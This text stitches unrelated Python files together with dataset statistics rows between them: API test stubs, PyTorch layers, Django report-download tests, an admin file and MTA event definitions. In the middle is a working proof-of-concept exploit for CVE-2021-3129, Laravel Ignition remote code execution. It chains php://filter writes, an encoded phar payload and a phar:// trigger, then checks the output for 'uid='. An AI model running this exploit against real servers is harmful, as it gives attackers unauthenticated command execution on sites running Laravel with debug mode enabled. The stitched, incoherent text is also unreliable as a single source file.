def test_audiences_create_audience(self):
"""Test case for audiences_create_audience
Creates a new audience from the given details for the logged in user. # noqa: E501
"""
pass
def test_audiences_create_audience_hit_for_audience(self):
"""Test case for audiences_create_audience_hit_for_audience
Register a hit (view) for the given audience # noqa: E501
"""
pass
def test_audiences_create_audience_update(self):
"""Test case for audiences_create_audience_update
Updates the details of a particular audience. If you don't have an id for the audience then POST to the /Audiences URL to create a new audience. # noqa: E501
"""
pass
def test_audiences_create_calculate_audience_data_licensing_job(self):
"""Test case for audiences_create_calculate_audience_data_licensing_job
Create a new job to get data licensing information for the latest version of this audience # noqa: E501
"""
pass
def test_audiences_create_calculate_audience_job_for_latest_update(self):
"""Test case for audiences_create_calculate_audience_job_for_latest_update
Create a new job to calculate counts against the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to produce the end result # noqa: E501
"""
pass
def test_audiences_create_check_audience_job_for_latest_update(self):
"""Test case for audiences_create_check_audience_job_for_latest_update
Create a new job to calculate check statistics against the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to identify the data to analyse and the specified dimensions will be used to perform the analysis. # noqa: E501
"""
pass
def test_audiences_create_export_audience_job_for_latest_update(self):
"""Test case for audiences_create_export_audience_job_for_latest_update
Create a new job to export data from the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to identify the data to export and the specified columns will be used to export the data, to a file and/or as a sample within the body of the result # noqa: E501
"""
pass
def test_audiences_delete_audience(self):
"""Test case for audiences_delete_audience
Deletes the specified audience # noqa: E501
"""
pass
def test_audiences_export_audience_latest_update_sync(self):
"""Test case for audiences_export_audience_latest_update_sync
Create a new job to export data from the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to identify the data to export and the specified columns will be used to export the data, to a file and/or as a sample within the body of the result # noqa: E501
"""
pass
def test_audiences_get_audience(self):
"""Test case for audiences_get_audience
Returns the details of a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_hit_for_audience(self):
"""Test case for audiences_get_audience_hit_for_audience
Returns details for a given audience hit for this audience # noqa: E501
"""
pass
def test_audiences_get_audience_hits_for_audience(self):
"""Test case for audiences_get_audience_hits_for_audience
Returns a summary of the hits for this audience - i.e. information about when users have viewed the audience. # noqa: E501
"""
pass
def test_audiences_get_audience_latest_native_for_nett_query(self):
"""Test case for audiences_get_audience_latest_native_for_nett_query
Returns native XML (i.e. for use with other FastStats applications) for the Nett query of the latest update for a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_result(self):
"""Test case for audiences_get_audience_result
Returns details of a particular result for a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_results(self):
"""Test case for audiences_get_audience_results
Returns a summary of the results for a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_update(self):
"""Test case for audiences_get_audience_update
Returns details of an update for a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_updates(self):
"""Test case for audiences_get_audience_updates
Returns a summary of the updates to a particular audience # noqa: E501
"""
pass
def test_audiences_get_audiences(self):
"""Test case for audiences_get_audiences
Requires OrbitAdmin: Gets summary information about each audience in the DataView. # noqa: E501
"""
pass
def test_audiences_get_calculate_audience_data_licensing_job(self):
"""Test case for audiences_get_calculate_audience_data_licensing_job
Get the status of a running calculate job # noqa: E501
"""
pass
def test_audiences_get_calculate_audience_job(self):
"""Test case for audiences_get_calculate_audience_job
Get the status of a running calculate job # noqa: E501
"""
pass
def test_audiences_get_check_audience_job(self):
"""Test case for audiences_get_check_audience_job
Get the status of a running check job # noqa: E501
"""
pass
def test_audiences_get_export_audience_job(self):
"""Test case for audiences_get_export_audience_job
Get the status of a running export job # noqa: E501
"""
pass
def test_audiences_transfer_audience_ownership(self):
"""Test case for audiences_transfer_audience_ownership
Transfer ownership of an audience from the current user to a new owner # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 37.187755 | 363 | 0.712875 | 1,227 | 9,111 | 5.039935 | 0.121434 | 0.042691 | 0.053364 | 0.097025 | 0.811934 | 0.777652 | 0.727361 | 0.681113 | 0.578913 | 0.478008 | 0 | 0.01461 | 0.241247 | 9,111 | 244 | 364 | 37.340164 | 0.879936 | 0.60641 | 0 | 0.430556 | 0 | 0 | 0.002767 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.444444 | false | 0.430556 | 0.069444 | 0 | 0.527778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
ce3f2a32ea9ccd66abb009d29316a5b0bb74013e | 4,369 | py | Python | cmvc/models/layer.py | kjun1/CMVC | e4ba0f3cf45080e784502dc5f59fd97051c3c884 | [
"MIT"
] | null | null | null | cmvc/models/layer.py | kjun1/CMVC | e4ba0f3cf45080e784502dc5f59fd97051c3c884 | [
"MIT"
] | null | null | null | cmvc/models/layer.py | kjun1/CMVC | e4ba0f3cf45080e784502dc5f59fd97051c3c884 | [
"MIT"
] | null | null | null | import torch
from torch import nn
class CBGLayer(nn.Module):
"""
Conv+Bn+GLU
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride,
padding=0):
super().__init__()
self.conv1 = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.conv2 = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn1 = nn.BatchNorm2d(out_channels)
self.bn2 = nn.BatchNorm2d(out_channels)
def forward(self, x):
x1 = self.bn1(self.conv1(x))
x2 = self.bn2(self.conv2(x))
x = torch.cat((x1, x2), 1)
x = nn.functional.glu(x, 1)
return x
class CBLLayer(nn.Module):
"""
Conv+Bn+LReLU
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride,
padding=0):
super().__init__()
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn = nn.BatchNorm2d(out_channels)
self.lrelu = nn.LeakyReLU()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.lrelu(x)
return x
class DBGLayer(nn.Module):
"""
Deconv + Bn + GLU
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride,
padding=0):
super().__init__()
self.deconv1 = nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.deconv2 = nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn1 = nn.BatchNorm2d(out_channels)
self.bn2 = nn.BatchNorm2d(out_channels)
def forward(self, x):
x1 = self.bn1(self.deconv1(x))
x2 = self.bn2(self.deconv2(x))
x = torch.cat((x1, x2), 1)
x = nn.functional.glu(x, 1)
return x
class DBSLayer(nn.Module):
"""
Deconv + Bn + SoftPlus
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride,
padding=0):
super().__init__()
self.deconv = nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn = nn.BatchNorm2d(out_channels)
self.softplus = nn.Softplus()
def forward(self, x):
x = self.deconv(x)
x = self.bn(x)
x = self.softplus(x)
return x
class FlattenLayer(nn.Module):
"""
(N, C, H, W)を(N, C*H*W)にする
"""
def forward(self, x):
sizes = x.size()
return x.view(sizes[0], -1)
class ReshapeLayer(nn.Module):
"""
(N, C*H*W)を(N, C, H, W)にする
"""
def forward(self, x, out_channel):
sizes = x.size()
h = int((sizes[1] / out_channel)**0.5)
return x.view(sizes[0], out_channel, h, h)
| 29.126667 | 69 | 0.43328 | 417 | 4,369 | 4.326139 | 0.141487 | 0.134146 | 0.168514 | 0.116408 | 0.795455 | 0.761086 | 0.738914 | 0.723392 | 0.723392 | 0.723392 | 0 | 0.021739 | 0.473564 | 4,369 | 149 | 70 | 29.322148 | 0.762609 | 0.027466 | 0 | 0.728155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097087 | false | 0 | 0.019417 | 0 | 0.23301 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
65f84abc2c738544ec026e6dd2dac81a59f878a7 | 10,256 | py | Python | download_file/test/test_views.py | uktrade/fadmin2 | 0f774400fb816c9ca30e30b25ae542135966e185 | [
"MIT"
] | null | null | null | download_file/test/test_views.py | uktrade/fadmin2 | 0f774400fb816c9ca30e30b25ae542135966e185 | [
"MIT"
] | 6 | 2022-01-17T16:14:53.000Z | 2022-03-30T08:31:56.000Z | download_file/test/test_views.py | uktrade/fadmin2 | 0f774400fb816c9ca30e30b25ae542135966e185 | [
"MIT"
] | null | null | null | import io
from bs4 import BeautifulSoup
from django.contrib.auth.models import Permission
from django.urls import reverse
from openpyxl import load_workbook
from chartofaccountDIT.test.factories import (
NaturalCodeFactory,
ProgrammeCodeFactory,
ProjectCodeFactory,
)
from core.models import FinancialYear
from core.test.test_base import BaseTestCase
from core.utils.generic_helpers import (
get_current_financial_year,
get_financial_year_obj,
)
from costcentre.test.factories import CostCentreFactory
from forecast.models import (
BudgetMonthlyFigure,
FinancialCode,
FinancialPeriod,
ForecastMonthlyFigure,
)
class DownloadViewTests(BaseTestCase):
def setUp(self):
self.client.force_login(self.test_user)
self.cost_centre_code = 670911
self.cost_centre = CostCentreFactory(cost_centre_code=self.cost_centre_code,)
current_year = get_current_financial_year()
self.amount_apr = -234567
self.amount_may = 345216
self.programme_obj = ProgrammeCodeFactory()
nac_obj = NaturalCodeFactory()
project_obj = ProjectCodeFactory()
self.programme_code = project_obj.project_code
year_obj = FinancialYear.objects.get(financial_year=current_year)
# If you use the MonthlyFigureFactory the test fails.
# I cannot work out why, it may be due to using a random year....
financial_code_obj = FinancialCode.objects.create(
programme=self.programme_obj,
cost_centre=self.cost_centre,
natural_account_code=nac_obj,
project_code=project_obj,
)
financial_code_obj.save
apr_figure = ForecastMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=1),
financial_code=financial_code_obj,
financial_year=year_obj,
amount=self.amount_apr,
)
apr_figure.save
may_figure = ForecastMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=2,),
amount=self.amount_may,
financial_code=financial_code_obj,
financial_year=year_obj,
)
may_figure.save
self.year_total = self.amount_apr + self.amount_may
def test_download_mi_view(self):
assert not self.test_user.has_perm("forecast.can_download_mi_reports")
downloaded_files_url = reverse("download_mi_report",)
# Should have been redirected (no permission)
resp = self.client.get(downloaded_files_url, follow=False)
assert resp.status_code == 403
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
resp = self.client.get(downloaded_files_url)
# Should have been permission now
self.assertEqual(resp.status_code, 200)
def test_download_mi_report(self):
assert not self.test_user.has_perm("forecast.can_download_mi_reports")
downloaded_files_url = reverse(
"download_mi_report_source",
kwargs={"financial_year": get_current_financial_year()}
)
response = self.client.get(downloaded_files_url)
self.assertEqual(response.status_code, 302)
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
response = self.client.get(downloaded_files_url)
self.assertEqual(response.status_code, 200)
file = io.BytesIO(response.content)
wb = load_workbook(filename=file, read_only=True,)
ws = wb.active
self.assertEqual(ws["A1"].value, "Entity")
self.assertEqual(ws["A2"].value, "3000")
self.assertEqual(ws["I1"].value, "MAY")
self.assertEqual(ws["I1"].value, "MAY")
self.assertEqual(ws["I1"].value, "MAY")
self.assertEqual(ws["H2"].value, self.amount_apr / 100)
self.assertEqual(ws["I2"].value, self.amount_may / 100)
self.assertEqual(ws["W2"].value, self.year_total / 100)
wb.close()
class DownloadMIBudgetViewTests(BaseTestCase):
def setUp(self):
self.client.force_login(self.test_user)
self.cost_centre_code = 670911
cost_centre = CostCentreFactory(cost_centre_code=self.cost_centre_code,)
current_year = get_current_financial_year()
self.amount_apr = -234567
self.amount_may = 345216
self.programme_obj = ProgrammeCodeFactory()
nac_obj = NaturalCodeFactory()
project_obj = ProjectCodeFactory()
self.programme_code = project_obj.project_code
year_obj = FinancialYear.objects.get(financial_year=current_year)
# If you use the MonthlyFigureFactory the test fails.
# I cannot work out why, it may be due to using a random year....
financial_code_obj = FinancialCode.objects.create(
programme=self.programme_obj,
cost_centre=cost_centre,
natural_account_code=nac_obj,
project_code=project_obj,
)
financial_code_obj.save
apr_figure = BudgetMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=1),
financial_code=financial_code_obj,
financial_year=year_obj,
amount=self.amount_apr,
)
apr_figure.save
may_figure = BudgetMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=2,),
amount=self.amount_may,
financial_code=financial_code_obj,
financial_year=year_obj,
)
may_figure.save
financial_code_obj1 = FinancialCode.objects.create(
programme=self.programme_obj,
cost_centre=cost_centre,
natural_account_code=nac_obj,
)
may_figure1 = BudgetMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=2,),
amount=self.amount_may,
financial_code=financial_code_obj1,
financial_year=year_obj,
)
may_figure1.save
self.year_total = self.amount_apr + self.amount_may
def test_download_mi_budget(self):
assert not self.test_user.has_perm("forecast.can_download_mi_reports")
downloaded_files_url = reverse(
"download_mi_budget",
kwargs={"financial_year": get_current_financial_year()}
)
response = self.client.get(downloaded_files_url)
self.assertEqual(response.status_code, 302)
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
response = self.client.get(downloaded_files_url)
self.assertEqual(response.status_code, 200)
file = io.BytesIO(response.content)
wb = load_workbook(filename=file, read_only=True,)
ws = wb.active
self.assertEqual(ws["A1"].value, "Entity")
self.assertEqual(ws["A2"].value, "3000")
self.assertEqual(ws["I1"].value, "MAY")
self.assertEqual(ws["H2"].value, self.amount_apr / 100)
self.assertEqual(ws["I2"].value, self.amount_may / 100)
self.assertEqual(ws["W2"].value, self.year_total / 100)
wb.close()
class DownloadOscarPermissionTests():
def setUp(self):
self.client.force_login(self.test_user)
def test_download_oscar_view(self):
assert not self.test_user.has_perm("forecast.can_download_oscar")
downloaded_files_url = reverse("download_oscar_report", )
# Should have been redirected (no permission)
resp = self.client.get(
downloaded_files_url
)
assert resp.status_code == 403
can_download_files = Permission.objects.get(codename="can_download_oscar", )
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
resp = self.client.get(downloaded_files_url)
# Should have been permission now
self.assertEqual(resp.status_code, 200)
class DownloadMIViewLabelTests(BaseTestCase):
def setUp(self):
self.client.force_login(self.test_user)
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
def test_previous_year_label(self):
previous_year_obj = get_financial_year_obj(get_current_financial_year() - 1)
previous_year_display = previous_year_obj.financial_year_display
downloaded_files_url = reverse("download_mi_report",)
response = self.client.get(downloaded_files_url, follow=False)
soup = BeautifulSoup(response.content, features="html.parser")
# Check that the text of the button shows the previous year
previous_year_button = soup.find(id="id_previous_year_button")
self.assertIn(previous_year_display, str(previous_year_button))
class DownloadMICurrentYearDropdownTests(BaseTestCase):
def setUp(self):
self.client.force_login(self.test_user)
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
self.current_year = get_current_financial_year()
# Create future years
get_financial_year_obj(self.current_year + 1)
get_financial_year_obj(self.current_year + 2)
get_financial_year_obj(self.current_year + 3)
def test_selectedyear(self):
downloaded_files_url = reverse("download_mi_report",)
response = self.client.get(downloaded_files_url, follow=False)
soup = BeautifulSoup(response.content, features="html.parser")
download_year_option = soup.find_all('option', selected=True)
selected_year = download_year_option[0]['value']
assert (int(selected_year) == self.current_year)
| 38.848485 | 88 | 0.691888 | 1,217 | 10,256 | 5.528348 | 0.14544 | 0.042509 | 0.037455 | 0.034185 | 0.81629 | 0.807967 | 0.802913 | 0.787753 | 0.786118 | 0.786118 | 0 | 0.014382 | 0.220359 | 10,256 | 263 | 89 | 38.996198 | 0.827039 | 0.044949 | 0 | 0.641148 | 0 | 0 | 0.052944 | 0.031378 | 0 | 0 | 0 | 0 | 0.133971 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.129187 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5a241302b5c32f6194d0ed7843e39f6dbf0330fb | 201 | py | Python | filechecker/admin.py | acdh-oeaw/acdh-django-filechecker | c4cee7dcf823efacc85676c81d97df9cb3e0aa26 | [
"MIT"
] | null | null | null | filechecker/admin.py | acdh-oeaw/acdh-django-filechecker | c4cee7dcf823efacc85676c81d97df9cb3e0aa26 | [
"MIT"
] | 6 | 2020-06-05T18:32:02.000Z | 2022-02-10T07:22:24.000Z | filechecker/admin.py | acdh-oeaw/acdh-django-filechecker | c4cee7dcf823efacc85676c81d97df9cb3e0aa26 | [
"MIT"
] | 1 | 2020-06-30T13:52:41.000Z | 2020-06-30T13:52:41.000Z | from django.contrib import admin
from mptt.admin import MPTTModelAdmin
from . models import FcCollection, FcResource
admin.site.register(FcCollection, MPTTModelAdmin)
admin.site.register(FcResource)
| 25.125 | 49 | 0.840796 | 24 | 201 | 7.041667 | 0.5 | 0.106509 | 0.201183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094527 | 201 | 7 | 50 | 28.714286 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ce479b287ee016901d26d23680bed130edafbc5f | 7,691 | py | Python | 2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | [
"Apache-2.0"
] | 421 | 2021-12-07T08:46:40.000Z | 2022-03-31T12:42:16.000Z | 2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | [
"Apache-2.0"
] | 5 | 2022-03-27T07:37:32.000Z | 2022-03-31T13:56:11.000Z | 2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | [
"Apache-2.0"
] | 144 | 2021-12-07T11:06:14.000Z | 2022-03-31T07:41:35.000Z | import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Laravel <= v8.4.2 Debug Mode - Remote Code Execution''',
"description": '''Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.''',
"severity": "critical",
"references": [
"https://www.ambionics.io/blog/laravel-debug-rce",
"https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-3129",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "laravel", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp2 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp3 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp4 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
resp5 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp5.status_code == 500) and ("""uid=""" in resp5.text and """gid=""" in resp5.text and """groups=""" in resp5.text and """Illuminate""" in resp5.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url | 78.479592 | 2,844 | 0.655051 | 1,462 | 7,691 | 3.432969 | 0.164843 | 0.057382 | 0.086073 | 0.076509 | 0.679219 | 0.611078 | 0.611078 | 0.548516 | 0.516238 | 0.485555 | 0 | 0.266755 | 0.11533 | 7,691 | 98 | 2,845 | 78.479592 | 0.470899 | 0.011442 | 0 | 0.273973 | 0 | 0.09589 | 0.667149 | 0.496973 | 0 | 1 | 0 | 0 | 0 | 1 | 0.068493 | false | 0 | 0.013699 | 0.041096 | 0.150685 | 0.054795 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ce519d7c9cfbbb1ae8ab6b8592048552398639bb | 42,296 | py | Python | events/vehicle_events.py | mtasa-typescript/mtasa-wiki-dump | edea1746850fb6c99d6155d1d7891e2cceb33a5c | [
"MIT"
] | null | null | null | events/vehicle_events.py | mtasa-typescript/mtasa-wiki-dump | edea1746850fb6c99d6155d1d7891e2cceb33a5c | [
"MIT"
] | 1 | 2021-02-24T21:50:18.000Z | 2021-02-24T21:50:18.000Z | events/vehicle_events.py | mtasa-typescript/mtasa-wiki-dump | edea1746850fb6c99d6155d1d7891e2cceb33a5c | [
"MIT"
] | null | null | null | # Autogenerated file. ANY CHANGES WILL BE OVERWRITTEN
from to_python.core.types import FunctionType, \
FunctionArgument, \
FunctionArgumentValues, \
FunctionReturnTypes, \
FunctionSignature, \
FunctionDoc, \
EventData, \
CompoundEventData
DUMP_PARTIAL = [
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientTrailerAttach',
docs=FunctionDoc(
description='This event is triggered by a trailer when it gets attached to a towing vehicle.' ,
arguments={
"towedBy": """the vehicle that is now towing the trailer. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='towedBy',
argument_type=FunctionType(
names=['vehicle'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientTrailerDetach',
docs=FunctionDoc(
description='This event is triggered when a trailer gets detached from its towing vehicle.' ,
arguments={
"towedBy": """the vehicle that was towing the trailer. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='towedBy',
argument_type=FunctionType(
